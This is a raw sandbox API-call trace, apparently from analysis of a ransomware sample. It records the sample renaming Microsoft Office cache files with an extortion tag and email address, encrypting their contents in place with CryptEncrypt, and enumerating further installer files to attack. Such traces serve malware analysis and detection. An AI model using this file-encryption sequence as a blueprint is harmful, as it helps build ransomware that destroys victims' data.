	[0090.850] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x102) returned 0x5fb420
	[0090.850] lstrcpyW (in: lpString1=0x5fb420, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi"
	[0090.850] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0090.850] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0090.853] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494
	[0090.853] GetProcessHeap () returned 0x540000
	[0090.853] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb420 | out: hHeap=0x540000) returned 1
	[0090.853] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1992192) returned 1
	[0090.853] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1e6600
	[0090.853] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0090.853] GetProcessHeap () returned 0x540000
	[0090.853] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0090.853] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0090.854] WriteFile (in: hFile=0x494, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0090.856] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0090.856] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0090.856] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1e6600) returned 0x3c20020
	[0090.856] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1e6600) returned 0x3e10020
	[0090.857] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0090.857] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x1e6600, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x1e6600, lpOverlapped=0x0) returned 1
	[0090.935] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1992192, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0090.935] WriteFile (in: hFile=0x494, lpBuffer=0x3e10020*, nNumberOfBytesToWrite=0x1e6600, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3e10020*, lpNumberOfBytesWritten=0x3a1f778*=0x1e6600, lpOverlapped=0x0) returned 1
	[0090.944] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3c20020 | out: hHeap=0x540000) returned 1
	[0090.953] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3e10020 | out: hHeap=0x540000) returned 1
	[0090.961] CloseHandle (hObject=0x494) returned 1
	[0090.977] GetProcessHeap () returned 0x540000
	[0090.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0090.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0090.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0090.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbce0 | out: hHeap=0x540000) returned 1
	[0090.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbc38 | out: hHeap=0x540000) returned 1
	[0090.977] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x90) returned 0x5fb420
	[0090.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb388 | out: hHeap=0x540000) returned 1
	[0090.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.977] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5580 | out: hHeap=0x540000) returned 1
	[0090.977] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xc9f11bf0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9f11bf0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da3f0
	[0090.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0090.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0090.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.978] GetLastError () returned 0x0
	[0090.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0090.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.978] GetLastError () returned 0x0
	[0090.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0090.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58bc00
	[0090.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58bc00 | out: hHeap=0x540000) returned 1
	[0090.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8db0
	[0090.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5da430
	[0090.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5da430 | out: hHeap=0x540000) returned 1
	[0090.978] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0090.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0090.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8db0 | out: hHeap=0x540000) returned 1
	[0090.978] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0090.978] FindNextFileW (in: hFindFile=0x5da3f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xc9f11bf0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9f11bf0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0090.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0090.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0090.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.979] GetLastError () returned 0x0
	[0090.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0090.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.979] GetLastError () returned 0x0
	[0090.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0090.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58bc00
	[0090.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58bc00 | out: hHeap=0x540000) returned 1
	[0090.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8db0
	[0090.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5da430
	[0090.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5da430 | out: hHeap=0x540000) returned 1
	[0090.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0090.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0090.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8db0 | out: hHeap=0x540000) returned 1
	[0090.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0090.979] FindNextFileW (in: hFindFile=0x5da3f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87078450, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87078450, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5d1e590, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1
	[0090.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0090.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0090.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.979] GetLastError () returned 0x0
	[0090.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0090.979] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.979] GetLastError () returned 0x0
	[0090.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8db0
	[0090.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0090.979] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0090.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8db0 | out: hHeap=0x540000) returned 1
	[0090.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbc38
	[0090.980] FindNextFileW (in: hFindFile=0x5da3f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87abdaa0, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87abdaa0, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5cd2aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1
	[0090.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0090.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0090.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.980] GetLastError () returned 0x0
	[0090.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0090.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.980] GetLastError () returned 0x0
	[0090.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8db0
	[0090.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0090.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0090.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8db0 | out: hHeap=0x540000) returned 1
	[0090.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbce0
	[0090.980] FindNextFileW (in: hFindFile=0x5da3f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe57f8e0, ftCreationTime.dwHighDateTime=0x1cbe1cb, ftLastAccessTime.dwLowDateTime=0xfe57f8e0, ftLastAccessTime.dwHighDateTime=0x1cbe1cb, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1
	[0090.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0090.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0090.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.980] GetLastError () returned 0x0
	[0090.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0090.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.980] GetLastError () returned 0x0
	[0090.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0090.980] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.980] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0090.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x90) returned 0x5fb388
	[0090.981] FindNextFileW (in: hFindFile=0x5da3f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6644b620, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x6644b620, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa81b8770, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1
	[0090.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0090.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0090.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.981] GetLastError () returned 0x0
	[0090.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0090.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.981] GetLastError () returned 0x0
	[0090.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8db0
	[0090.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0090.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0090.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8db0 | out: hHeap=0x540000) returned 1
	[0090.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbd88
	[0090.981] FindNextFileW (in: hFindFile=0x5da3f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8238e540, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x8238e540, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5ddcc70, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1
	[0090.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0090.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0090.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.981] GetLastError () returned 0x0
	[0090.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0090.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.981] GetLastError () returned 0x0
	[0090.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8db0
	[0090.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0090.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0090.981] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8db0 | out: hHeap=0x540000) returned 1
	[0090.981] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbe30
	[0090.982] FindNextFileW (in: hFindFile=0x5da3f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7bd91af0, ftCreationTime.dwHighDateTime=0x1cb07b2, ftLastAccessTime.dwLowDateTime=0x7bd91af0, ftLastAccessTime.dwHighDateTime=0x1cb07b2, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1
	[0090.982] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0090.982] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.982] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0090.982] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.982] GetLastError () returned 0x0
	[0090.982] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0090.982] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.982] GetLastError () returned 0x0
	[0090.982] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5d8db0
	[0090.982] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0090.982] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.982] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.982] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0090.982] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d8db0 | out: hHeap=0x540000) returned 1
	[0090.982] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbed8
	[0090.982] FindNextFileW (in: hFindFile=0x5da3f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2a2397e0, ftCreationTime.dwHighDateTime=0x1cbe19a, ftLastAccessTime.dwLowDateTime=0x2a2397e0, ftLastAccessTime.dwHighDateTime=0x1cbe19a, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1
	[0090.984] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0090.984] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.984] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0090.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.985] GetLastError () returned 0x0
	[0090.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0090.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.985] GetLastError () returned 0x0
	[0090.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583950
	[0090.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584930
	[0090.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584930 | out: hHeap=0x540000) returned 1
	[0090.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0090.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5fb4b8
	[0090.985] FindNextFileW (in: hFindFile=0x5da3f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c1614f0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7c1614f0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xa4c400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrjProrWW.msi", cAlternateFileName="PRJPRO~1.MSI")) returned 1
	[0090.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0090.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0090.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0090.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0090.985] GetLastError () returned 0x0
	[0090.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5db0d8
	[0090.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0090.985] GetLastError () returned 0x0
